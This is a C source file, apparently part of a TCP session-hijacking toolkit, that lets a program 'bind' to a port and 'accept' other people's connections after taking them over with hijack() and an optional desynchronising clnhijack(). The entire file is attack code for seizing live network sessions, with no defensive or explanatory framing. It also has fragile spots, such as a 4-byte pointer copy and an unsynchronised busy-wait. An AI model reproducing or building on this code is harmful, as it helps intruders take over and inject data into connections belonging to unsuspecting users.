#include <stdio.h>
#include <stdlib.h>

#include "hjklib.h"
#include "pkt_struct.h"

hb hjkbind(u_short,u_long,u_short);
struct connection *hjkaccept(struct binded_port *);
void hjklisten(struct binded_port *,int);
void check_bind(struct connection *conn);
hs hjkaccept(struct binded_port*);

struct binded_port *binds=NULL;


/* checking if the port is binded and if there's any accept() */

hs hjkaccept(hb bnd){
   char buff[10];
   hs res=NULL;
   
   memset(buff,0,10);
   bnd->handler[++bnd->hn]=(hs)&res;
   //printf("accept is waiting for 0x%x\n",&res);
   while(res==NULL);
   //printf("GOT IT\n");
   bnd->hn--;
   hjksend(res,buff,10,0);
   return(res);
}


void check_bind(hs conn){
   hb rec=binds;
   //printf("bind checking!\n");
   if(rec==NULL)return;
   while(rec!=NULL){
      if(rec->port==conn->dst.port && (rec->destaddr==0||rec->destaddr==conn->dst.addr)){
	 /* CHECK FOR ACCEPT () */
	 //printf("FOUND!\n");
	 
	 if(rec->handler[rec->hn]!=NULL){
	    //clnhijack(conn);
	    if(rec->dblhjk)clnhijack(conn);
	    conn->no_ack_server=1;
	    usleep(10000);
	    hijack(conn);
	    conn->serv_hijack=0; /* to 0.. coz we talk with the client */
	    //(void *)(void *)(rec->handler[rec->hn])=conn;
	    memcpy(rec->handler[rec->hn],&conn,4);
	    //printf("writing at 0x%x\n",rec->handler[rec->hn]);
	 }
	 break;
      }
      rec=rec->nxt;
   }
}
   
   

hb hjkbind(u_short port,u_long daddr,u_short flags){
   int i;
   struct binded_port toadd,*rec=binds;
   memset(&toadd,0,sizeof(toadd));
   toadd.nxt=NULL;
   toadd.port=port;
   toadd.destaddr=daddr;
   if(flags==DESYNC_ALL)
     toadd.dblhjk=1;
   if(binds==NULL){
      binds=(struct binded_port *)malloc(sizeof(struct binded_port));
      toadd.prv=NULL;
      memcpy(binds,&toadd,sizeof(toadd));
   }
   else{
      while(rec->nxt!=NULL)rec=rec->nxt;
      rec->nxt=(struct binded_port *)malloc(sizeof(struct binded_port));
      toadd.prv=rec;
      memcpy(rec->nxt,&toadd,sizeof(toadd));
   }
}
